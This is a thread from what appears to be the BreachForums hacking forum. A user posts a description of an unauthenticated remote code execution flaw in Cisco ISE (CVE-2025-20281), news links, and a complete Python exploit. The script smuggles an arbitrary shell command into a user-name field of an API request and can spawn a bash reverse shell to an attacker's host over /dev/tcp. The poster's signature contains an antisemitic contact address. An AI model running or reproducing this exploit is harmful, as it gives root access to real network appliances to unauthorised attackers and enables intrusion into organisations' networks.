JOIN BREACHFORUMS TELEGRAM
Cisco ISE - Unauthenticated RCE
by antisocial - Saturday July 26, 2025 at 08:21 AM
Anti-Social Personality Disorder
God
Posts: 88
Threads: 23
Joined: Jul 2024
Reputation: 724

HackerCoderGOD
#1
Jul 26, 2025, 08:21 AM
Thought i would share this since its really not that talked about but still pretty interesting, if you have anything you want to add please do so : )

Vulnerability description:
"A vulnerability in a specific API of Cisco ISE and Cisco ISE-PIC could allow an unauthenticated, remote attacker to execute arbitrary code on the underlying operating system as root. The attacker does not require any valid credentials to exploit this vulnerability. This vulnerability is due to insufficient validation of user-supplied input. An attacker could exploit this vulnerability by submitting a crafted API request. A successful exploit could allow the attacker to obtain root privileges on an affected device."

Articles:
https://thehackernews.com/2025/07/critic...ified.html
https://www.theregister.com/2025/06/26/p...fixes_two/
https://www.securityweek.com/critical-ci...execution/
https://www.bleepingcomputer.com/news/se...es-engine/
https://thehackernews.com/2025/06/critic...d-ise.html
https://securityaffairs.com/179362/secur...l-rce.html
[*]
#!/usr/bin/env python3
import requests
import urllib3
import argparse
urllib3.disable_warnings()
def exploit_cve_2025_20281_unauth(target, cmd):
    url = f"https://{target}:9060/ers/sdk#_"
    #url = f"https://{target}/ers/sdk#_"
    payload = {
        "InternalUser": {
            "name": f"pwn; {cmd}; #",
            "password": "x",        # dummy, ignored by vuln
            "changePassword": False
        }
    }
    r = requests.post(url, json=payload, verify=False)
    print(f"[+] HTTP {r.status_code}\n{r.text}\n")
def build_reverse_shell(lhost, lport):
    return f"/bin/bash -i >& /dev/tcp/{lhost}/{lport} 0>&1"
if __name__ == '__main__':
    parser = argparse.ArgumentParser(
        description="Unauthenticated PoC for CVE-2025-20281 on Cisco ISE ERS"
    )
    parser.add_argument('target', help="IP or hostname of the ISE PAN")
    group = parser.add_mutually_exclusive_group(required=True)
    group.add_argument(
        '--whoami',
        action='store_true',
        help="Run 'whoami' and print the result"
    )
    group.add_argument(
        '--reverse',
        nargs=2,
        metavar=('LHOST', 'LPORT'),
        help="Spawn a bash reverse shell to LHOST:LPORT"
    )
    args = parser.parse_args()
    if args.whoami:
        cmd = 'whoami'
    else:
        lhost, lport = args.reverse
        cmd = build_reverse_shell(lhost, lport)
    print(f"
Target: {args.target}")
    print(f"
Command: {cmd}\n")
    exploit_cve_2025_20281_unauth(args.target, cmd)
 
PGP
PGP ARCHIVE
contact: i@hateje.ws
Reply
Breached
Member
Posts: 40
Threads: 3
Joined: Jan 2025
Reputation: 0
#2
Jul 29, 2025, 06:50 AM
check check check
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  Cisco Secure Firewall Management Center(CVE-2026-20131) DirtyEra 0 104 10 hours ago
Last Post: DirtyEra
  POC CVE-2025-24071 caca28sapo1 16 1,129 Yesterday, 07:22 PM
Last Post: ucy
  Google Dorks for finding SQL injection vulnerabilities and other security issues 1yush 68 3,506 Yesterday, 07:09 PM
Last Post: 89UI
  New Zer0 Day Wordpress A3g00n 82 3,817 May 09, 2026, 01:14 PM
Last Post: wker
  {SECRET} DATABASE OF EXPLOITS lulagain 440 27,839 May 07, 2026, 09:44 PM
Last Post: caribou

Forum Jump:


 Users browsing this forum: 1 Guest(s)